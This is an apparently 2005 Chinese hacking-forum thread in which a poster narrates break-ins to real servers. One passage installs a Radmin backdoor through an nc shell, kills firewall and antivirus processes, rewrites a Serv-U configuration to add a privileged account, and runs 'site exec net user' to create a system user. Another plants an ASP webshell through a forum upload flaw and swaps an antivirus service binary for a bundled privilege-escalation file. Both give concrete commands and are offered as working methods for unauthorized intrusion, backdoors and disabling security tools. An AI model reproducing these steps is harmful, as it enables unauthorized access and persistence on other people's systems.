高興之餘,我們仍不滿足,因為這個shell實在是太慢了。于是,想用我們最常用的Radmin,其實管理者一按Alt+Ctrl+Del,看程序就能發現r_server了,但是還是喜歡用它,是因為不會被清除。好了,上傳admdll.dll,raddrv.dll,r_server.exe到H://long//sun***//lemon,再用剛才nc得到的shell把它們copy到d://winnt//system32//下,分别運作:r_server /install , net start r_server , r_server /pass:rain /save 。 一陣漫長的等待,終于顯示成功了。興沖沖用radmin連上去,發現連接配接失敗。暈死,忘了有防火牆了。上傳pslist和pskill上去,發現有backice,木馬克星等。Kill掉他們雖然可以登陸,但伺服器重新開機後還是不行,終不是長久之計呀。防火牆是不防21,80等端口的,于是,我們的思路又回到了serv-u上了。把他的ServUDaemon.ini下載下傳下來,覆寫本機的ServUDaemon.ini,在本機的serv-u上添加一個使用者名為xr,密碼為rain的系統帳号,加上所有權限。再用老辦法,上傳,用shell寫入D://program files//serv-u//裡,覆寫掉原來的ServUDaemon.ini。雖然又等了n長時間,但是成功了,于是用flashfxp連上,發生530錯誤。郁悶,怎麼又失敗了。(根據經驗這樣應該就可以了,但為什麼不行沒有想通,請高手指點。) 不管了,我們重新開機serv-u就ok了,怎麼重新開機呢,開始想用shutdown重新開機系統,但那樣我們就失去了nc這個shell,還可能被發現。後來,眼睛一亮,我們不是有pskill嗎?剛才用pslist發現有這個程序:ServUDaemon 。把它kill了。然後再運作D://program files//serv-u// ServUAdmin.exe ,這裡要注意不是ServUDaemon.exe 。 好了,到這裡,我們直接ftp上去吧,ls一下,哈哈,系統盤在我的掌握下。我們能不能運作系統指令呢?是可以的,這樣就可以: ftp>quote site exec net user xr rain /add 在webshell上運作net user,就可以看見添加成功了。 整個入侵滲透到這就結束了,在一陣後清理打掃後。我們就開始讨論了。其實,突破防火牆有很多好的rootkit可以做到的,但是我們覺得系統自帶的服務才是最安全的後門。 | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:33:31 --
| |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:33:49 -- 巧用asp木馬和KV2004得到管理者權限 重來沒寫過什麼文章,這是第一次,寫的不好請大家原諒,高手也不要取笑哦。這裡也沒什麼技術可言,隻是我這個菜鳥的一點心得,ok開始。。。 前段時間動網的UPfile.asp漏洞可謂鬧的沸沸揚揚,這個漏洞确實很厲害,相信不少新手和我一樣種了不少後門在有動網的網站上,但是asp木馬的權限确實很底,除了删點文章,删點圖檔好象沒什麼用了。不行不得到管理者權限簡直就辜負了發現這個漏洞的高手們~v~。好,想辦法提升權限,我找啊找!網上提升權限的方法幾乎都用過了,都沒什麼用,更新檔打的很全啊!接下來用findpass想解開管理者的密碼,又失敗,findpass要管理者權限才有用。用pslist看看暈裝的是瑞星+天網,網上的大部分工具遇上這個防禦組合一般都沒用了。種木馬?不行一來 權限太底,二來在瑞星殺天網堵的包圍下很少能活出來的。做個添加使用者權限的bat檔案想放到啟動組中去,這個方法雖然有點傻但是有一定的可行性,暈又是權限不夠加不進去。c盤下的"Program Files" "winnt" "Documents and Settings"三個檔案甲都沒有寫權限,更不要說系統資料庫了。郁悶了,給管理者留了句話,然後匆匆下線。 第2天上來一看,嘿嘿圖被改回來了,管理者應該發現了,這次更不容易得手。登上asp木馬進去看了一下,昨天傳上去的幾個exe被删了,還好asp木馬活下來了,咦!c盤多了檔案甲叫KV2004,原來管理者把瑞星卸了,安了個kv2004,進Program Files看看确實瑞星被卸了。(這裡說一下,大部分的防毒軟體預設的安裝路徑c://Program Files//,但是kv預設的安裝路徑是c://kv2004//)到這裡機會就來了我們可以把執行檔案捆綁在kv2004上,跟随kv一起啟動。因為kv不在"Program Files" "winnt" "Documents and Settings"這三個檔案甲中,很大可能我可以修改 或者上傳檔案。行動!在kv2004下随便找個htm檔案删除:(看看有無寫删權限) C://>del c://kv2004//GetLicense.htm 拒絕通路 奇怪了,再來看看檔案甲屬性 C://>attrib c://kv2004 S R C://KV2004 哦是隻讀。 C://>attrib -r -s c://kv2004 ok!在試試 C://>del c://kv2004//GetLicense.htm 成功了!好寫個起用帳号和提升權限的bat檔案,然後把bat檔案和kv2004的系統服務檔案KVSrvXP.exe捆綁起來,(注意多下種捆綁器,捆綁一 次用kv2004來掃描一次,因為很多捆綁器生成的檔案kv會把他作為病毒來處理掉)準備上傳了,先删掉原來的KVSrvXP.exe。 C://>del c://kv2004//KVSrvXP.exe 拒絕通路 可能是KVSrvXP.exe被windows調用中,删不掉。沒辦法了嗎?不,删不掉我改名 C://>ren c://kv2004//KVSrvXP.exe kv.exe OK!然後用asp木馬把修改了的KVSrvXP.exe上傳到kv2004中,接下來就去睡覺把。 4個小時後登上來用: net user 起用的帳戶 已經在administrators組中,接下來要關防火牆,關防毒軟體,還是種木馬你随便我了,哈哈! 我覺得入侵沒什麼固定的模式,具體情況具體分析,防毒軟體同樣也可以幫我們忙,這裡我隻提供了一種思路。請大家指教。 | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:34:20 --
|